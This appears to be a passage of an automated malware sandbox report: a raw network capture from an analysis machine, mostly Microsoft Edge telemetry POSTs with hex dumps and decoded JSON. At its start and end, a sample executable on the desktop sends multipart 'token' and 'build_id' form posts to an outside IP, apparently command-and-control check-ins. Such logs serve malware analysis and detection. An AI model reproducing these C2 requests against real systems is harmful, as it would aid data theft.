                                                                                                                                                                                                                                                Data Ascii: ------YCB1NOPHVKFUAI5XB1VSContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------YCB1NOPHVKFUAI5XB1VSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------YCB1NOPHVKFUAI5XB1VSCont
                                                                                                                                                                                                                                                2024-12-16 14:40:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.74995513.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365266521&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 5893
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC5893OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 41 70 70 45 72 72 6f 72 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 34 36 2e 35 32 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-12-16T16:07:46.520Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=ef68c465c7924b07acf335c94c0a91e4&HASH=ef68&LV=202412&V=4&LU=1734360026265; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=5df6a74879d646f68ff5dda87e3371c8; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5240256
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:25 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.74995913.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270083&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 11611
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC11611OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 35 30 2e 30 38 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.081Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=4d7951676a0741929e28a19d5dad0013&HASH=4d79&LV=202412&V=4&LU=1734360026575; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=f2ef6acd803d4369b091a4afa9f6bcf3; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243508
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.74996113.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270097&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 32893
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 35 30 2e 30 39 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.093Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC16384OUTData Raw: 6e 67 26 69 73 46 52 45 4d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3d 31 26 73 74 61 72 74 70 61 67 65 3d 31 26 50 43 3d 55 35 33 31 26 6f 63 69 64 3d 6d 73 65 64 67 64 68 70 22 2c 22 76 69 65 77 54 79 70 65 22 3a 22 73 69 7a 65 33 63 6f 6c 75 6d 6e 22 2c 22 74 68 65 6d 65 22 3a 22 6c 69 67 68 74 22 2c 22 68 61 73 33 50 53 65 61 72 63 68 22 3a 66 61 6c 73 65 2c 22 69 73 53 65 61 72 63 68 41 42 22 3a 66 61 6c 73 65 2c 22 69 73 4d 6f 6e 65 74 69 7a 65 64 22 3a 66 61 6c 73 65 2c 22 70 69 76 6f 74 22 3a 22 22 2c 22 72 65 66 65 72 72 61 6c 22 3a 22 22 2c 22 64 77 65 6c 6c 54 69 6d 65 22 3a 30 7d 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 73 4d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 77 69 64 74 68 22 3a 31 32 38 30 2c 22 68 65 69 67 68 74 22 3a 39 38 34 2c
                                                                                                                                                                                                                                                Data Ascii: ng&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"light","has3PSearch":false,"isSearchAB":false,"isMonetized":false,"pivot":"","referral":"","dwellTime":0},"browser":{"isMobile":false,"width":1280,"height":984,
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC125OUTData Raw: 53 65 6c 66 22 3a 31 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69 7a 65 22 3a 37 37 39 2c 22 63 61 63 68 65 22 3a 30 7d 7d 7d 7d 7d 7d 2c 22 64 65 76 69 63 65 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 7b 22 6d 65 6d 6f 72 79 22 3a 38 2c 22 63 70 75 22 3a 34 2c 22 6e 65 74 77 6f 72 6b 53 70 65 65 64 22 3a 22 33 67 22 7d 7d 7d 7d
                                                                                                                                                                                                                                                Data Ascii: Self":1,"cdnOrigin":0},"scalars":{"size":779,"cache":0}}}}}},"deviceCapabilities":{"memory":8,"cpu":4,"networkSpeed":"3g"}}}}
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=e55b9ac95f7941caa8ef21816e09746e&HASH=e55b&LV=202412&V=4&LU=1734360026795; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=e67d44eca6c34d08b6d7239901ae89d3; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243302
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.74996213.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270898&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 5279
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC5279OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 35 30 2e 38 39 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.896Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=57dfb17be3104fa5b0471d0ef59aa8dc&HASH=57df&LV=202412&V=4&LU=1734360027146; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=de308152604947eeb848c4f8c8b720f8; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243752
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:27 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.74996313.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365271077&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 9682
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC9682OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 35 31 2e 30 37 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-16T16:07:51.077Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"loca
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=bc3f0bc32ee742b09752ddef15cbf1f9&HASH=bc3f&LV=202412&V=4&LU=1734360027421; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=4c7a67e324884937830e3e1f1b5fe698; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243656
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:27 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                43192.168.2.749968116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9RIW4ECJ5XBAAI58QIEC
